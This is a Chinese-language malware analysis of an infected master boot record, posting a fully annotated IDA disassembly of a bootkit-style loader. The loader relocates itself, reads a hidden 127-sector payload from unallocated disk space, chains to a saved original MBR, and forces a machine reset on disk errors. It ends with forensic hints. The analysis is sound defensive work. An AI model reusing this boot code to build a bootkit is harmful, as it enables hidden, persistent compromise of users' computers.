不多说,先用 WinHex 把有用的部分(硬盘第一个扇区,即 512 字节的 MBR)复制出来,保存为 mbr.bin。
回来之后ida开始反汇编
反汇编的时候 IDA 提示不知道入口,直接分析就可以。文件是 BIOS 直接装载到 0000:7C00 地址执行的;注意下面的 IDA 列表把 7C00h 当成了段基址,列表中的 seg000:0100 对应 MBR 偏移 0,而代码一开始又把自己搬到 0000:0600,所以代码里出现的 61Dh、6DFh、7A4h、7B4h 等绝对地址都是"600h + MBR 偏移"。
分析完一部分之后 IDA 停止了,因为它不知道 jmp far ptr 0:61Dh 跳到哪里(目标是搬到 0600h 之后的那份副本)。人工分析发现这相当于就是从 seg000:011D 向下继续执行,于是让 IDA 从那里继续分析。
人工分析代码,已经标上了注释,代码贴在下面
seg000:0100 ;
seg000:0100 ; +-------------------------------------------------------------------------+
seg000:0100 ; |   This file has been generated by The Interactive Disassembler (IDA)    |
seg000:0100 ; |                    Copyright (c) 2009 by Hex-Rays,                      |
seg000:0100 ; |                    License info: 77-4B83-901C-A6                        |
seg000:0100 ; |                           Licensed User                                 |
seg000:0100 ; +-------------------------------------------------------------------------+
seg000:0100 ;
seg000:0100 ; Input MD5   : 9A4CD7E035BD114990C4EE31EDAD9296
seg000:0100
seg000:0100 ; ---------------------------------------------------------------------------
seg000:0100 ; File Name   : F:\datas\mbr.bin
seg000:0100 ; Format      : Binary file
seg000:0100 ; Base Address: 7C00h Range: 7C100h - 7C300h Loaded length: 0200h
seg000:0100 ;
seg000:0100 ; NOTE(review): IDA was given 7C00h as a *segment* base, so listing offset 0100h
seg000:0100 ; is MBR byte 0: MBR offset X appears here as seg000:(0100h+X).  At run time the
seg000:0100 ; BIOS loads the sector at 0000:7C00 and the code immediately copies itself to
seg000:0100 ; 0000:0600, so every absolute address the code uses (61Dh, 6DFh, 7A4h, 7B4h)
seg000:0100 ; is 0600h + MBR offset.
seg000:0100 ;
seg000:0100 ; Control flow (a bootkit-style first-stage loader):
seg000:0100 ;   1. relocate to 0000:0600 and continue executing there;
seg000:0100 ;   2. read the byte at 0000:0234 (low byte of the INT 8Dh IVT slot, normally
seg000:0100 ;      unused) and set it to 1 -- it serves as a "second pass" marker;
seg000:0100 ;   3. first pass (marker was not 1): LBA-read 127 sectors starting at the LBA
seg000:0100 ;      stored in this MBR at 7B4h (0CAFABBCh, see data at seg000:02B4) into
seg000:0100 ;      3000:0100 and far-return into it;
seg000:0100 ;   4. second pass (marker == 1): CHS-read sector 6 of drive 80h (LBA 5) to
seg000:0100 ;      0000:7C00 and far-return to it -- presumably the saved original MBR, so
seg000:0100 ;      the normal boot continues once the payload has run (TODO confirm by
seg000:0100 ;      dumping LBA 5 of the disk);
seg000:0100 ;   5. any disk error: print "Read disk failed!", busy-wait, then reset the box.
seg000:0100 ; IR hint: acquire sector 6 (saved MBR) and the 127 sectors at LBA 0CAFABBCh;
seg000:0100 ; the on-disk pointer to the payload lives in the MBR at offset 1B4h.
seg000:0100
seg000:0100                 .686p
seg000:0100                 .mmx
seg000:0100                 .model flat
seg000:0100
seg000:0100 ; ===========================================================================
seg000:0100
seg000:0100 ; Segment type: Pure code
seg000:0100 seg000          segment byte public 'CODE' use16
seg000:0100                 assume cs:seg000
seg000:0100                 ;org 100h
seg000:0100                 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:0100                 cli                     ; no interrupts while SS:SP is being switched
seg000:0101                 xor     ax, ax
seg000:0103                 mov     ss, ax
seg000:0105                 mov     sp, 7C00h       ; stack grows down from just below this sector
seg000:0108                 mov     si, sp          ; DS:SI = 0000:7C00 -> source = this sector
seg000:010A                 push    ax
seg000:010B                 pop     es              ; ES = 0
seg000:010C                 push    ax
seg000:010D                 pop     ds              ; DS = 0
seg000:010E                 sti
seg000:010F                 cld
seg000:0110                 mov     di, 600h        ; ES:DI = 0000:0600 -> destination
seg000:0113                 mov     cx, 100h        ; 100h words = 512 bytes = the whole sector
seg000:0116                 rep movsw               ; relocate self to 0000:0600 (not 6100h)
seg000:0118                 jmp     far ptr 0:61Dh  ; continue in the copy: 61Dh = 600h + 1Dh = the next instruction
seg000:011D ; ---------------------------------------------------------------------------
seg000:011D                 xor     ax, ax
seg000:011F                 mov     es, ax
seg000:0121                 mov     cl, es:234h     ; 0000:0234 = IVT entry for INT 8Dh (234h / 4 = 8Dh);
seg000:0121                                         ; its low byte is (ab)used as a "payload already loaded" flag
seg000:0126                 cmp     cl, 1
seg000:0129                 mov     byte ptr es:234h, 1 ; set the flag; mov does not touch ZF, so jnz still tests the cmp
seg000:012F                 jnz     short loc_7C14C ; flag was not 1 -> first pass: load the payload
seg000:0131                 mov     ax, 0           ; flag was 1 -> second pass: chain to the saved MBR
seg000:0134                 mov     es, ax
seg000:0136                 mov     ax, 201h        ; AH = 02h read sectors (CHS), AL = 1 sector
seg000:0139                 mov     bx, 7C00h       ; ES:BX = 0000:7C00, where the BIOS would have put the MBR
seg000:013C                 mov     cx, 6           ; CH = 0 cylinder 0, CL = 6 sector 6 (1-based) = LBA 5
seg000:013F                 mov     dx, 80h         ; DH = 0 head 0, DL = 80h first hard disk
seg000:0142                 int     13h             ; DISK - READ SECTORS INTO MEMORY
seg000:0142                                         ; AL = number of sectors to read, CH = track, CL = sector
seg000:0142                                         ; DH = head, DL = drive, ES:BX -> buffer to fill
seg000:0142                                         ; Return: CF set on error, AH = status, AL = number of sectors read
seg000:0144                 jb      short loc_7C19F ; CF = 1: I/O error -> message + reset
seg000:0146                 mov     di, 7C00h
seg000:0149                 push    es              ; ES = 0
seg000:014A                 push    di              ; 7C00h
seg000:014B                 retf                    ; far jump to 0000:7C00 = the sector just read (presumably the original MBR)
seg000:014C ; ---------------------------------------------------------------------------
seg000:014C
seg000:014C loc_7C14C:                              ; CODE XREF: seg000:012Fj
seg000:014C                 mov     ax, 3000h
seg000:014F                 rol     eax, 10h        ; rotate by 16: AX (3000h) becomes the high word of EAX
seg000:0153                 mov     ax, 100h        ; EAX = 30000100h = far pointer 3000:0100 (linear 30100h), NOT 300100h
seg000:0156                 push    eax             ; kept on the stack as the retf target below
seg000:0158                 xor     bx, bx
seg000:015A                 mov     es, bx
seg000:015C                 mov     si, 7B4h        ; 7B4h = 600h + 1B4h: a dword stored inside this MBR (see seg000:02B4)
seg000:015C                                         ; Disk Address Packet is built at 7A4h (MBR offset 1A4h, zero padding in the image):
seg000:015C                                         ; struct DiskAddressPacket {
seg000:015C                                         ;   BYTE  PacketSize;   // 16                       7A4h
seg000:015C                                         ;   BYTE  Reserved;     // must be 0                7A5h
seg000:015C                                         ;   WORD  BlockCount;   // sectors to transfer      7A6h
seg000:015C                                         ;   DWORD BufferAddr;   // segment:offset           7A8h
seg000:015C                                         ;   QWORD BlockNum;     // starting absolute LBA    7ACh
seg000:015C                                         ; };
seg000:015F                 mov     ebx, cs:[si]    ; EBX = 0CAFABBCh: starting LBA of the hidden payload (CS = 0 after the far jmp)
seg000:0163                 mov     si, 7A4h
seg000:0166                 mov     word ptr cs:[si], 10h ; PacketSize = 16, Reserved = 0 (one 16-bit store)
seg000:016B                 mov     word ptr cs:[si+2], 7Fh ; BlockCount = 127 sectors (63.5 KiB)
seg000:0171                 mov     cs:[si+4], eax  ; BufferAddr = 3000:0100
seg000:0176                 mov     cs:[si+8], ebx  ; BlockNum, low dword = 0CAFABBCh
seg000:017B                 mov     dword ptr cs:[si+0Ch], 0 ; BlockNum, high dword = 0
seg000:0184                 mov     dl, 80h         ; first hard disk
seg000:0186                 mov     ah, 42h         ; INT 13h extended read (LBA)
seg000:0188                 xor     al, al
seg000:0188                                         ; AH = 42h, DL = drive, DS:SI -> Disk Address Packet (DS = 0 here)
seg000:0188                                         ; Return: CF = 0 / AH = 0 on success, CF = 1 / AH = error code;
seg000:0188                                         ; on error BlockCount holds the number of sectors actually read
seg000:018A                 int     13h             ; DISK - EXTENDED READ
seg000:018C                 jb      short loc_7C19F ; CF = 1: error -> message + reset
seg000:018E                 pop     ebx             ; EBX = 30000100h
seg000:0190                 push    ebx             ; leave it on the stack for retf
seg000:0192                 shr     ebx, 10h        ; BX = 3000h (not 30010h)
seg000:0196                 mov     es, bx          ; ES = 3000h (not 10h)
seg000:0198                 mov     byte ptr es:124h, 1 ; store 1 at 3000:0124 = payload offset 24h;
seg000:0198                                         ; presumably tells the payload it was loaded by this stage -- TODO confirm against the payload
seg000:019E                 retf                    ; pops IP = 0100h, CS = 3000h -> executes the payload at 3000:0100
seg000:019F ; ---------------------------------------------------------------------------
seg000:019F
seg000:019F loc_7C19F:                              ; CODE XREF: seg000:0144j
seg000:019F                                         ; seg000:018Cj
seg000:019F                 mov     si, 6DFh        ; 6DFh = 600h + 0DFh -> aReadDiskFailed (seg000:01DF)
seg000:01A2
seg000:01A2 loc_7C1A2:                              ; CODE XREF: seg000:01B0j
seg000:01A2                 lodsb                   ; AL = *SI++
seg000:01A3                 cmp     al, 0
seg000:01A5                 jz      short loc_7C1B2 ; NUL terminator -> done printing
seg000:01A7                 push    si
seg000:01A8                 mov     bx, 7           ; BH = 0 display page 0, BL = 7 light grey
seg000:01AB                 mov     ah, 0Eh
seg000:01AD                 int     10h             ; - VIDEO - WRITE CHARACTER AND ADVANCE CURSOR (TTY WRITE)
seg000:01AD                                         ; AL = character, BH = display page (alpha modes)
seg000:01AD                                         ; BL = foreground color (graphics modes)
seg000:01AF                 pop     si
seg000:01B0                 jmp     short loc_7C1A2 ; next character
seg000:01B2 ; ---------------------------------------------------------------------------
seg000:01B2
seg000:01B2 loc_7C1B2:                              ; CODE XREF: seg000:01A5j
seg000:01B2                 push    ecx             ; busy-wait ~2^32 iterations so the message stays visible
seg000:01B4                 mov     ecx, 0FFFFFFFFh
seg000:01BA
seg000:01BA loc_7C1BA:                              ; CODE XREF: seg000:01C4j
seg000:01BA                 cmp     ecx, 0
seg000:01BE                 jz      short loc_7C1C6
seg000:01C0                 sub     ecx, 1
seg000:01C4                 jmp     short loc_7C1BA
seg000:01C6 ; ---------------------------------------------------------------------------
seg000:01C6
seg000:01C6 loc_7C1C6:                              ; CODE XREF: seg000:01BEj
seg000:01C6                 push    dx              ; three successive machine-reset attempts follow (this is NOT harmless hardware setup)
seg000:01C7                 push    ax
seg000:01C8                 mov     dx, 64h         ; 8042 keyboard-controller command port
seg000:01CB                 mov     al, 0FEh        ; command 0FEh = pulse output line 0 low = CPU reset (IDA's "resend" label is the keyboard *response* 0FEh, not this)
seg000:01CD                 out     dx, al
seg000:01CE                 in      al, 92h         ; System Control Port A
seg000:01D0                 or      al, 1           ; bit 0 = fast reset; the A20 gate is bit 1, so this is NOT enabling A20
seg000:01D2                 out     92h, al
seg000:01D4                 mov     dx, 0CF9h       ; chipset Reset Control Register (Intel ICH-style)
seg000:01D7                 in      al, dx
seg000:01D8                 or      al, 6           ; bits 1|2 = system reset + CPU reset
seg000:01DA                 out     dx, al
seg000:01DB                 pop     ax              ; only reached if none of the resets took effect
seg000:01DC                 pop     dx
seg000:01DD
seg000:01DD loc_7C1DD:                              ; CODE XREF: seg000:loc_7C1DDj
seg000:01DD                 jmp     short loc_7C1DD ; halt forever
seg000:01DD ; ---------------------------------------------------------------------------
seg000:01DF aReadDiskFailed db 'Read disk failed!',0Dh,0Ah,0 ; printed by loc_7C19F; runtime address 6DFh
seg000:01F3                 db    0                 ; zero padding; the DAP is built at runtime over MBR offset 1A4h (seg000:02A4)
seg000:01F4                 db    0
seg000:01F5                 db    0
seg000:01F6                 db    0
seg000:01F7                 db    0
seg000:01F8                 db    0
seg000:01F9                 db    0
seg000:01FA                 db    0
seg000:01FB                 db    0
seg000:01FC                 db    0
seg000:01FD                 db    0
seg000:01FE                 db    0
seg000:01FF                 db    0
seg000:0200                 db    0
seg000:0201                 db    0
seg000:0202                 db    0
seg000:0203                 db    0
seg000:0204                 db    0
seg000:0205                 db    0
seg000:0206                 db    0
seg000:0207                 db    0
seg000:0208                 db    0
seg000:0209                 db    0
seg000:020A                 db    0
seg000:020B                 db    0
seg000:020C                 db    0
seg000:020D                 db    0
seg000:020E                 db    0
seg000:020F                 db    0
seg000:0210                 db    0
seg000:0211                 db    0
seg000:0212                 db    0
seg000:0213                 db    0
seg000:0214                 db    0
seg000:0215                 db    0
seg000:0216                 db    0
seg000:0217                 db    0
seg000:0218                 db    0
seg000:0219                 db    0
seg000:021A                 db    0
seg000:021B                 db    0
seg000:021C                 db    0
seg000:021D                 db    0
seg000:021E                 db    0
seg000:021F                 db    0
seg000:0220                 db    0
seg000:0221                 db    0
seg000:0222                 db    0
seg000:0223                 db    0
seg000:0224                 db    0
seg000:0225                 db    0
seg000:0226                 db    0
seg000:0227                 db    0
seg000:0228                 db    0
seg000:0229                 db    0
seg000:022A                 db    0
seg000:022B                 db    0
seg000:022C                 db    0
seg000:022D                 db    0
seg000:022E                 db    0
seg000:022F                 db    0
seg000:0230                 db    0
seg000:0231                 db    0
seg000:0232                 db    0
seg000:0233                 db    0
seg000:0234                 db    0
seg000:0235                 db    0
seg000:0236                 db    0
seg000:0237                 db    0
seg000:0238                 db    0
seg000:0239                 db    0
seg000:023A                 db    0
seg000:023B                 db    0
seg000:023C                 db    0
seg000:023D                 db    0
seg000:023E                 db    0
seg000:023F                 db    0
seg000:0240                 db    0
seg000:0241                 db    0
seg000:0242                 db    0
seg000:0243                 db    0
seg000:0244                 db    0
seg000:0245                 db    0
seg000:0246                 db    0
seg000:0247                 db    0
seg000:0248                 db    0
seg000:0249                 db    0                 ; zero padding continues up to the payload LBA at seg000:02B4
seg000:024A                 db    0
seg000:024B                 db    0
seg000:024C                 db    0
seg000:024D                 db    0
seg000:024E                 db    0
seg000:024F                 db    0
seg000:0250                 db    0
seg000:0251                 db    0
seg000:0252                 db    0
seg000:0253                 db    0
seg000:0254                 db    0
seg000:0255                 db    0
seg000:0256                 db    0
seg000:0257                 db    0
seg000:0258                 db    0
seg000:0259                 db    0
seg000:025A                 db    0
seg000:025B                 db    0
seg000:025C                 db    0
seg000:025D                 db    0
seg000:025E                 db    0
seg000:025F                 db    0
seg000:0260                 db    0
seg000:0261                 db    0
seg000:0262                 db    0
seg000:0263                 db    0
seg000:0264                 db    0
seg000:0265                 db    0
seg000:0266                 db    0
seg000:0267                 db    0
seg000:0268                 db    0
seg000:0269                 db    0
seg000:026A                 db    0
seg000:026B                 db    0
seg000:026C                 db    0
seg000:026D                 db    0
seg000:026E                 db    0
seg000:026F                 db    0
seg000:0270                 db    0
seg000:0271                 db    0
seg000:0272                 db    0
seg000:0273                 db    0
seg000:0274                 db    0
seg000:0275                 db    0
seg000:0276                 db    0
seg000:0277                 db    0
seg000:0278                 db    0
seg000:0279                 db    0
seg000:027A                 db    0
seg000:027B                 db    0
seg000:027C                 db    0
seg000:027D                 db    0
seg000:027E                 db    0
seg000:027F                 db    0
seg000:0280                 db    0
seg000:0281                 db    0
seg000:0282                 db    0
seg000:0283                 db    0
seg000:0284                 db    0
seg000:0285                 db    0
seg000:0286                 db    0
seg000:0287                 db    0
seg000:0288                 db    0
seg000:0289                 db    0
seg000:028A                 db    0
seg000:028B                 db    0
seg000:028C                 db    0
seg000:028D                 db    0
seg000:028E                 db    0
seg000:028F                 db    0
seg000:0290                 db    0
seg000:0291                 db    0
seg000:0292                 db    0
seg000:0293                 db    0
seg000:0294                 db    0
seg000:0295                 db    0
seg000:0296                 db    0
seg000:0297                 db    0
seg000:0298                 db    0
seg000:0299                 db    0
seg000:029A                 db    0
seg000:029B                 db    0
seg000:029C                 db    0
seg000:029D                 db    0
seg000:029E                 db    0
seg000:029F                 db    0
seg000:02A0                 db    0
seg000:02A1                 db    0
seg000:02A2                 db    0
seg000:02A3                 db    0
seg000:02A4                 db    0                 ; MBR offset 1A4h = runtime 7A4h: the 16-byte Disk Address Packet is written here by loc_7C14C
seg000:02A5                 db    0
seg000:02A6                 db    0
seg000:02A7                 db    0
seg000:02A8                 db    0
seg000:02A9                 db    0
seg000:02AA                 db    0
seg000:02AB                 db    0
seg000:02AC                 db    0
seg000:02AD                 db    0
seg000:02AE                 db    0
seg000:02AF                 db    0
seg000:02B0                 db    0
seg000:02B1                 db    0
seg000:02B2                 db    0
seg000:02B3                 db    0
seg000:02B4                 db 0BCh                 ; dword 0CAFABBCh at MBR offset 1B4h (runtime 7B4h): starting LBA of the
seg000:02B5                 db 0ABh                 ; 127-sector payload loaded by loc_7C14C (presumably patched in by the installer).
seg000:02B6                 db 0AFh                 ; It lies after partition 1 (ends at LBA 3Fh + 0C33F789h = 0C33F7C8h) and before
seg000:02B7                 db 0Ch                  ; partition 2 (starts at 35B11108h), i.e. in unallocated space -- if this table is intact
seg000:02B8                 db 39h                  ; dword 7F52E739h at MBR offset 1B8h = the standard NT disk-signature slot
seg000:02B9                 db 0E7h
seg000:02BA                 db 52h
seg000:02BB                 db 7Fh
seg000:02BC                 db 0                    ; word at offset 1BCh = 0100h; a Windows MBR normally has 0000h here -- worth a second look
seg000:02BD                 db 1
seg000:02BE                 db 80h                  ; partition entry 1 (offset 1BEh): 80h = active/bootable
seg000:02BF                 db 1                    ; start CHS: head 1, sector 1, cylinder 0
seg000:02C0                 db 1
seg000:02C1                 db 0
seg000:02C2                 db 7                    ; type 07h (NTFS / HPFS / exFAT)
seg000:02C3                 db 0FEh                 ; end CHS FE 3F FF (clamped, beyond CHS range)
seg000:02C4                 db 3Fh
seg000:02C5                 db 0FFh
seg000:02C6                 db 3Fh                  ; start LBA 0000003Fh (63)
seg000:02C7                 db 0
seg000:02C8                 db 0
seg000:02C9                 db 0
seg000:02CA                 db 89h                  ; sector count 0C33F789h
seg000:02CB                 db 0F7h
seg000:02CC                 db 33h
seg000:02CD                 db 0Ch
seg000:02CE                 db 0                    ; partition entry 2 (offset 1CEh): not active
seg000:02CF                 db 0FEh                 ; start CHS FE 3F FF (clamped)
seg000:02D0                 db 3Fh
seg000:02D1                 db 0FFh
seg000:02D2                 db 7                    ; type 07h
seg000:02D3                 db 0FEh                 ; end CHS FE 3F FF (clamped)
seg000:02D4                 db 3Fh
seg000:02D5                 db 0FFh
seg000:02D6                 db 8                    ; start LBA 35B11108h
seg000:02D7                 db 11h
seg000:02D8                 db 0B1h
seg000:02D9                 db 35h
seg000:02DA                 db 70h                  ; sector count 04850670h
seg000:02DB                 db 6
seg000:02DC                 db 85h
seg000:02DD                 db 4
seg000:02DE                 db 0                    ; partition entries 3 and 4 (offsets 1DEh, 1EEh): empty
seg000:02DF                 db 0
seg000:02E0                 db 0
seg000:02E1                 db 0
seg000:02E2                 db 0
seg000:02E3                 db 0
seg000:02E4                 db 0
seg000:02E5                 db 0
seg000:02E6                 db 0
seg000:02E7                 db 0
seg000:02E8                 db 0
seg000:02E9                 db 0
seg000:02EA                 db 0
seg000:02EB                 db 0
seg000:02EC                 db 0
seg000:02ED                 db 0
seg000:02EE                 db 0
seg000:02EF                 db 0
seg000:02F0                 db 0
seg000:02F1                 db 0
seg000:02F2                 db 0
seg000:02F3                 db 0
seg000:02F4                 db 0
seg000:02F5                 db 0
seg000:02F6                 db 0
seg000:02F7                 db 0
seg000:02F8                 db 0
seg000:02F9                 db 0
seg000:02FA                 db 0
seg000:02FB                 db 0
seg000:02FC                 db 0
seg000:02FD                 db 0
seg000:02FE                 db 55h                  ; boot signature 55AAh (offset 1FEh)
seg000:02FF                 db 0AAh
seg000:02FF seg000          ends
seg000:02FF
seg000:02FF
seg000:02FF                 end